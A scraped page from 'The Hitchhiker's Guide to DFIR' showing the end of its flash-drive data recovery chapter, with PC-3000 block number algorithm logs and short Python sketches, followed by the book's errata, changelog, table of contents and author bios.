[05.09.2022 11:09:26]: Algorithm parameters autodetection... Block size detection
[05.09.2022 11:09:28]: Shift of marker within sector: 512 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Shift of marker within sector: 513 Calculated value of block size: 0256 Probability: 318464 Mask: Undefined! Identifier structure: Undefined! Variant is not correct and removed from analysis
[05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Variants of marker position::
[05.09.2022 11:09:29]: Shift of marker within sector: 512 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Shift of marker within sector: 514 Calculated value of block size: 0256 Probability: 318464 Mask : 01FF Identifier structure: 1234
[05.09.2022 11:09:29]: Try other parameters in case of bad result .
[05.09.2022 11:09:29]: The following parameters will be applied:
[05.09.2022 11:09:29]: Marker position............. 512
[05.09.2022 11:09:29]: Block Size (in sectors)..... 256
[05.09.2022 11:09:29]: Shift of the analysis start. 0
[05.09.2022 11:09:29]: Mask........................ 0xFFFF
[05.09.2022 11:09:29]: Identifier structure........ 1234
[05.09.2022 11:09:29]: Blocks integrity testing.... No
[05.09.2022 11:09:29]: Blocks within the bounds of bank..... NO
[05.09.2022 11:09:29]: Page Size................... 8
[05.09.2022 11:09:29]: Sector number for getting marker value(The main passage): 0
[05.09.2022 11:09:29]: Sector number for getting marker value(Additional passage): 0
[05.09.2022 11:09:29]: Direct Image Building NO
[05.09.2022 11:09:29]: Skip Block Empty first page YES
[05.09.2022 11:09:29]: Special ConditionUse marker from 0 addon NO
[05.09.2022 11:09:29]: Marker analysis. Allocation by banks.
[05.09.2022 11:09:29]: Bank size 512 -> Value adjusted.
[05.09.2022 11:09:29]: Bank 00 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 01 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 02 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 03 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 04 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 05 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 06 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: Bank 07 Block Number D: 000512 H: 0200
[05.09.2022 11:09:29]: ----------------------------------------------------------------
[05.09.2022 11:09:29]: Shaped banks and boundaries
[05.09.2022 11:09:29]: Bank: 000 ( Number of blocks: 00512 (0x 200) )-> Range of sectors: 000000000 - 000131071
[05.09.2022 11:09:29]: Bank: 001 ( Number of blocks: 00512 (0x 200) )-> Range of sectors: 000131072 - 000262143
[05.09.2022 11:09:29]: Bank: 002 ( Number of blocks: 00512 (0x 200) )-> Range of sectors: 000262144 - 000393215
[05.09.2022 11:09:29]: Bank: 003 ( Number of blocks: 00512 (0x 200) )-> Range of sectors: 000393216 - 000524287
[05.09.2022 11:09:29]: Bank: 004 ( Number of blocks: 00512 (0x 200) )-> Range of sectors: 000524288 - 000655359
[05.09.2022 11:09:29]: Bank: 005 ( Number of blocks: 00512 (0x 200) )-> Range of sectors: 000655360 - 000786431
[05.09.2022 11:09:29]: Bank: 006 ( Number of blocks: 00512 (0x 200) )-> Range of sectors: 000786432 - 000917503
[05.09.2022 11:09:29]: Bank: 007 ( Number of blocks: 00511 (0x 1FF) )-> Range of sectors: 000917504 - 001048319
[05.09.2022 11:09:29]: ----------------------------------------------------------------
[05.09.2022 11:09:29]: Partition header is not correct! It's recommended to use Version table and Quick disk analysis
[05.09.2022 11:09:29]: Duration : 00:00:04
Sector was read successfully
Apparently, the process worked – so check the result:
12.65 - Context-menu -> View first sector
If you click on the new entry in the Folders pane, you can see immediately that the result does
not work: instead of offering a filesystem, the entry cannot be expanded!
This indicates the wrong block number algorithm or the wrong parameters. Before I try other
parameters, I try the other algorithms!
If you right-click on the result, you can use View the first sector to see that this sector cannot
possibly be the MBR:
12.66 - First sector of block number result
You don’t have a valid partition table, nothing that looks like a bootloader, and no 0x55AA as MBR
signature in the last 2 bytes.
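This manual check is easy to script if you want to test many candidate results. A minimal sketch;
512 bytes per sector and the signature at offset 510 are the classic MBR layout:

def looks_like_mbr(sector: bytes) -> bool:
    # a classic MBR is 512 bytes and ends with the signature 0x55 0xAA
    return len(sector) == 512 and sector[510:512] == b"\x55\xAA"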
You can remove the unusable result of Type 1 with a right-click and the option Delete.
After that, I try Type 5, as usual with the Autodetect option first. However, this produces the
following error in the log tab:
[05.09.2022 11:12:57]: Applying method : Block Number (Type 5) [0x1001]...
[05.09.2022 11:12:57]: Autodetection is impossible. Write parameters manually!
[2022-09-05 11:13:47]: Duration : 00:00:50
[05.09.2022 11:13:47]: Either errors occurred during recovery, or the process was interrupted.
There is also a message box informing you that the process failed, which offers to delete the failed
result right away:
12.67 - Block number algorithm failed message
Therefore, I open the dialog for Type 5 again and remove the checkmark for Autodetect:
12.68 - Block number type 5 with default values
I leave the marker position at 512 bytes. This is also consistent with what you saw in Page designer.
For Block size in sectors, I leave the proposed 256 sectors. However, you can easily confirm this
by viewing the service information:
12.69 - Service information
Here you see the boundary between block 0 and block 1 (B = block). Block 0 consists of pages 0x00
– 0x3F (P = pages). With this information you can use the Python shell to calculate: 0x00 through
0x3F is 0x40 pages in hexadecimal notation, and at 4 sectors per page:
>>> 0x40*4
256
So, you have sectors 0 – 255 in block 0. This confirms the 256 sectors per block.
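With these parameters confirmed (marker at byte 512 of each 528-byte raw sector, 256 sectors per
block, mask 0x01FF from the autodetection log above), the core of a block number algorithm can be
sketched in Python. This is a simplification under assumptions: a single bank, a little-endian
16-bit marker, and the marker of the first sector standing for the whole block; the real
implementation also handles banks, duplicate markers and empty pages:

import struct

SECTOR_RAW = 512 + 16              # data area + service area
SECTORS_PER_BLOCK = 256
BLOCK_RAW = SECTOR_RAW * SECTORS_PER_BLOCK

def rebuild_by_block_number(dump: bytes) -> bytes:
    blocks = {}
    for off in range(0, len(dump) - BLOCK_RAW + 1, BLOCK_RAW):
        # the marker sits at byte 512, i.e. at the start of the SA
        (marker,) = struct.unpack_from("<H", dump, off + 512)
        blocks[marker & 0x01FF] = dump[off:off + BLOCK_RAW]
    out = bytearray()
    for num in sorted(blocks):     # logical (marker) order
        blk = blocks[num]
        for s in range(SECTORS_PER_BLOCK):
            out += blk[s * SECTOR_RAW:s * SECTOR_RAW + 512]  # DA only
    return bytes(out)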
As soon as you use these values to build a virtual block-device with the Apply-button, you see the
following messages in the log tab:
[05.09.2022 11:14:34]: Applying method : Block Number (Type 5) [0x1001]...
[05.09.2022 11:14:35]: The following parameters will be applied:
[05.09.2022 11:14:35]: Marker position............. 512
[05.09.2022 11:14:35]: Block Size (in sectors)..... 256
[05.09.2022 11:14:35]: Only even blocks............ No
[2022-09-05 11:14:50]: Duration : 00:00:15
This time you can expand the entry for Type 5:
12.70 - Block number type 5 working
You can also see from the green dots that the JPG files are valid according to the structure check of
PC-3000.
If you want to view one of the images, you can right-click on the filename to open the context-
menu and then select the entry Open. The file is then opened with the standard program set in
Windows for the respective file type.
Of course, you can also back up the data:
12.71 - Save user data
To do this, I set the check mark on the folder Root (root directory of the partition). Then I right-click
Root in the Folders pane and select Save marked... from the context-menu.
After that, you only have to specify where the data should be stored and start the process.
Reading the chips is always the same, but there may be cases when you need to do the de-scrambling
with XOR before the ECC correction.
After successfully assembling a virtual block device, you can right-click on Block device (Type 5)
[0x1001] and select Image to file to create a binary image of the partition, which you can then
load into a forensics tool of your choice.
A flash chip-off case can easily get more complex:
12.72 - A more complex transformation graph
Some cases have even more complex transformations than the one shown above! Getting good at
this type of data recovery requires time, training and research. This is the reason why I recommend
that beginners start with HDDs rather than flash data recovery: even with basic knowledge, the
success rate will be much higher.
Errata
Reporting Errata
If you think you’ve found an error relating to spelling, grammar, or anything else that’s currently
holding this book back from being the best it can be, please visit the book’s GitHub repository²⁸² and
create an Issue detailing the error you’ve found. Anyone is also welcome to submit a Pull Request
with new content, fixes, changes, etc.
²⁸²https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/issues
Changelog
• v1.0²⁸³ - August 15, 2022
• v1.1²⁸⁴ - September 10, 2022
²⁸³https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/v1.0
²⁸⁴https://github.com/Digital-Forensics-Discord-Server/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts/releases/tag/v1.1

More Related Content

PPTX
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
PDF
Cyber Security Awareness
PDF
IBM QRadar Security Intelligence Overview
PDF
Cyber Security Governance
PPTX
HealthCare Compliance - HIPAA and HITRUST
PDF
Red Team Framework
PPTX
Chapter 11: Information Security Incident Management
PDF
Information Security It's All About Compliance
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Cyber Security Awareness
IBM QRadar Security Intelligence Overview
Cyber Security Governance
HealthCare Compliance - HIPAA and HITRUST
Red Team Framework
Chapter 11: Information Security Incident Management
Information Security It's All About Compliance

What's hot (20)

PPT
Isms awareness training
PPTX
McAfee SIEM solution
PDF
Cyber Threat Intelligence
PPTX
Introduction to PCI DSS
PPTX
Intrusion Prevention System
PPTX
Roadmap to security operations excellence
PPTX
Security Operation Center Fundamental
PPT
Chapter 1 Presentation
PPTX
Security operation center
PPTX
SOC 2 Compliance and Certification
PPTX
Information Security Management System ISO/IEC 27001:2005
PDF
SOC Architecture - Building the NextGen SOC
PPTX
Cyber Security 101: Training, awareness, strategies for small to medium sized...
PPTX
NIST CyberSecurity Framework: An Overview
PDF
NIST Cybersecurity Framework (CSF) 2.0 Workshop
PPTX
IBM Security QRadar
PDF
HITRUST 101: All the basics you need to know
PDF
CISSP Cheatsheet.pdf
PPTX
Soc 2 attestation or ISO 27001 certification - Which is better for organization
Isms awareness training
McAfee SIEM solution
Cyber Threat Intelligence
Introduction to PCI DSS
Intrusion Prevention System
Roadmap to security operations excellence
Security Operation Center Fundamental
Chapter 1 Presentation
Security operation center
SOC 2 Compliance and Certification
Information Security Management System ISO/IEC 27001:2005
SOC Architecture - Building the NextGen SOC
Cyber Security 101: Training, awareness, strategies for small to medium sized...
NIST CyberSecurity Framework: An Overview
NIST Cybersecurity Framework (CSF) 2.0 Workshop
IBM Security QRadar
HITRUST 101: All the basics you need to know
CISSP Cheatsheet.pdf
Soc 2 attestation or ISO 27001 certification - Which is better for organization
Ad

Similar to DFIR (20)

PDF
Laravel 4 Documentation
PDF
WindowsForensicAnalysisLearnyou here.pdf
PDF
The Art of Monitoring (2016).pdf
PDF
The IT Manager's Guide to DevOps
PDF
The Defender's Dilemma
PDF
E views 9 command ref
PDF
Leaving addie for sam field guide guidelines and temst learning experiences
PDF
The road-to-learn-react
PDF
Flutter Apprentice (First Edition) - Learn to Build Cross-Platform Apps.pdf
PDF
Arduino: Empezando con Arduino V2
PDF
Arduino: Crea bots y gadgets Arduino aprendiendo mediante el descubrimiento d...
PDF
Highperformance Buildings A Guide For Owners Managers Robinson
PDF
Struts Live
PDF
Jakarta struts
PDF
Jakarta strutslive
PDF
EloquenFundamentalsof Web Developmentt_JavaScript.pdf
PDF
Eloquent JavaScript Book for Beginners to Learn Javascript
PDF
E views 6 users guide i
PDF
Rprogramming
PDF
Faronics Deep Freeze Server Enterprise User Guide
Laravel 4 Documentation
WindowsForensicAnalysisLearnyou here.pdf
The Art of Monitoring (2016).pdf
The IT Manager's Guide to DevOps
The Defender's Dilemma
E views 9 command ref
Leaving addie for sam field guide guidelines and temst learning experiences
The road-to-learn-react
Flutter Apprentice (First Edition) - Learn to Build Cross-Platform Apps.pdf
Arduino: Empezando con Arduino V2
Arduino: Crea bots y gadgets Arduino aprendiendo mediante el descubrimiento d...
Highperformance Buildings A Guide For Owners Managers Robinson
Struts Live
Jakarta struts
Jakarta strutslive
EloquenFundamentalsof Web Developmentt_JavaScript.pdf
Eloquent JavaScript Book for Beginners to Learn Javascript
E views 6 users guide i
Rprogramming
Faronics Deep Freeze Server Enterprise User Guide
Ad

Recently uploaded (20)

PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
PPTX
Funds Management Learning Material for Beg
PDF
Slides PDF: The World Game (s) Eco Economic Epochs.pdf
PPTX
Power Point - Lesson 3_2.pptx grad school presentation
PPTX
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
PDF
si manuel quezon at mga nagawa sa bansang pilipinas
PDF
Smart Home Technology for Health Monitoring (www.kiu.ac.ug)
PDF
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
PDF
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
PPTX
1402_iCSC_-_RESTful_Web_APIs_--_Josef_Hammer.pptx
PPT
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
PPTX
newyork.pptxirantrafgshenepalchinachinane
PPTX
SAP Ariba Sourcing PPT for learning material
PDF
Exploring VPS Hosting Trends for SMBs in 2025
PDF
Uptota Investor Deck - Where Africa Meets Blockchain
PPTX
Layers_of_the_Earth_Grade7.pptx class by
PDF
SASE Traffic Flow - ZTNA Connector-1.pdf
PPT
250152213-Excitation-SystemWERRT (1).ppt
PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
PPTX
E -tech empowerment technologies PowerPoint
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
Funds Management Learning Material for Beg
Slides PDF: The World Game (s) Eco Economic Epochs.pdf
Power Point - Lesson 3_2.pptx grad school presentation
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
si manuel quezon at mga nagawa sa bansang pilipinas
Smart Home Technology for Health Monitoring (www.kiu.ac.ug)
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
1402_iCSC_-_RESTful_Web_APIs_--_Josef_Hammer.pptx
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
newyork.pptxirantrafgshenepalchinachinane
SAP Ariba Sourcing PPT for learning material
Exploring VPS Hosting Trends for SMBs in 2025
Uptota Investor Deck - Where Africa Meets Blockchain
Layers_of_the_Earth_Grade7.pptx class by
SASE Traffic Flow - ZTNA Connector-1.pdf
250152213-Excitation-SystemWERRT (1).ppt
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
E -tech empowerment technologies PowerPoint

DFIR

  • 2. The Hitchhiker’s Guide to DFIR: Experiences From Beginners and Experts A crowdsourced Digital Forensics and Incident Response (DFIR) book by the members of the Digital Forensics Discord Server Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John Haynes, Guus Beckers, Barry Grundy, Tristram, Victor Heiland, Jason Wilkins and Mark Berger This book is for sale at http://leanpub.com/TheHitchhikersGuidetoDFIRExperiencesFromBeginnersandExperts This version was published on 2022-11-28 ISBN 979-8-9863359-0-2 This is a Leanpub book. Leanpub empowers authors and publishers with the Lean Publishing process. Lean Publishing is the act of publishing an in-progress ebook using lightweight tools and many iterations to get reader feedback, pivot until you have the right book and build traction once you do. © 2022 Andrew Rathbun, ApexPredator, Kevin Pagano, Nisarg Suthar, John Haynes, Guus Beckers, Barry Grundy, Tristram, Victor Heiland, Jason Wilkins and Mark Berger
  • 3. This book is dedicated to all the practitioners and professionals in the niche of DFIR. It is for all those, beginners and experts alike, who spend sleepless nights expanding their horizons of knowledge in efforts to bring a change, small or big. Happy Sleuthing! :)
  • 4. Contents Authors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Contributors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 Chapter 0 - Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Purpose of This Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Community Participation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 Final Thoughts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Chapter 1 - History of the Digital Forensics Discord Server . . . . . . . . . . . . . . . . . . . . 14 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 Beginnings in IRC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 Move to Discord . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 Mobile Forensics Discord Server ⇒ Digital Forensics Discord Server . . . . . . . . . . . . . 17 Member Growth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Hosting the 2020 Magnet Virtual Summit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 Community Engagement Within the Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 Impact on the DFIR community . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 Law Enforcement Personnel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 Forensic 4:cast Awards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Future . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 Chapter 2 - Basic Malware Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 Basic Malware Analysis Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 Basic Malware Analysis Walkthrough . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 Analysis Wrap-Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 Chapter 3 - Password Cracking for Beginners . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 Disclaimer & Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 Password Hashes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 Useful Software Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68 Hash Extraction Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
  • 5. CONTENTS Hash Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 Attacking the Hash . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 Installing Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74 “Brute-Forcing” with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 Hashcat’s Potfile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77 Dictionary (Wordlist) Attack with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78 Dictionary + Rules with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 Robust Encryption Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 Complex Password Testing with Hashcat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 Searching a Dictionary for a Password . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81 Generating Custom Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82 Paring Down Custom Wordlists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Additional Resources and Advanced Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . 86 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 Chapter 4 - Large Scale Android Application Analysis . . . . . . . . . . . . . . . . . . . . . . . 88 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88 Part 1 - Automated Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89 Part 2 - Manual Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97 Problem of Scale . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 Part 3 - Using Autopsy, Jadx, and Python to Scrap and Parse Android Applications at Scale 103 Chapter 5 - De-Obfuscating PowerShell Payloads . . . . . . . . . . . . . . . . . . . . . . . . . . 115 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115 What Are We Dealing With? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116 Stigma of Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117 Word of Caution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118 Base64 Encoded Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119 Base64 Inline Expressions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121 GZip Compression . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123 Invoke Operator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126 String Reversing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
. 127 Replace Chaining . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 ASCII Translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129 Wrapping Up . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131 Chapter 6 - Gamification of DFIR: Playing CTFs . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 What is a CTF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 Why am I qualified to talk about CTFs? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 Types of CTFs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134 Evidence Aplenty . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
  • 6. CONTENTS Who’s Hosting? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136 Why Play a CTF? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137 Toss a Coin in the Tip Jar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138 Takeaways . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Chapter 7 - The Law Enforcement Digital Forensics Laboratory . . . . . . . . . . . . . . . . . 146 Setting Up and Getting Started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 Executive Cooperation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146 Physical Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148 Selecting Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148 Certification and Training . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151 Accreditation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152 Chapter 8 - Artifacts as Evidence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154 Forensic Science . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154 Types of Artifacts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156 What is Parsing? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157 Artifact-Evidence Relation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160 Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170 Chapter 9 - Forensic imaging in a nutshell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171 What is a disk image? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171 Creating a disk image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173 Memory forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177 Next Steps and Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 Chapter 10 - Linux and Digital Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 What is Linux? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180 Why Linux for Digital Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182 Choosing Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185 Learning Linux Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189 Linux Forensics in Action . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191 Closing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209 Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage . . . . . . . . . . . . . . . . . . . . 210 What is triage? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
210 What should be included in a triage? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210 Forensic triage of one or a limited amount of hosts . . . . . . . . . . . . . . . . . . . . . . . . 211 Scaling up to a medium-sized subnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 Scaling up to an entire network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 Other tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Practicing triage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214 Contributions and sources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
  • 7. CONTENTS Chapter 12 - Data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216 Logical data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217 Physical data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218 How to approach a data recovery case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220 Imaging of unstable HDDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229 Flash drive data recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245 Errata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285 Reporting Errata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285 Changelog . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
  • 8. Authors Andrew Rathbun Andrew Rathbun is a DFIR professional with multiple years of experience in law enforcement and the private sector. Andrew currently works at Kroll as a Vice President in Cyber Risk. Andrew is involved in multiple community projects, including but not limited to the Digital Forensics Discord Server¹, AboutDFIR², and multiple GitHub repositories³. You can find him on the DFIR discord⁴. ApexPredator After many years at the top of the Systems Administration food chain, the ApexPredator switched to the Cybersecurity food chain. The ApexPredator is working to the top while possessing an MS in Cybersecurity and Information Assurance degree and numerous certifications, including OSCE3 (OSWE, OSEP, OSED), OSCP, OSWP, GREM, GXPN, GPEN, GWAPT, GSLC, GCIA, GCIH and GSEC. Always hunting for more prey, it spends free time playing with malware analysis and exploit development. Barry Grundy A U.S. Marine Corps veteran, Barry Grundy has been working in the field of digital forensics since the mid-1990s. Starting at the Ohio Attorney General’s office as a criminal investigator, and eventually joining U.S. Federal Law Enforcement as a digital forensics analyst and computer crimes investigator in 2001. He holds a Bachelor of Science in Forensic Science from Ohio University, and A Master’s Degree in Forensic Computing and Cybercrime Investigations from University College Dublin. Barry is the author and maintainer of the Law Enforcement and Forensic Examiner’s Introduction to Linux (LinuxLEO⁵). This practical beginner’s guide to 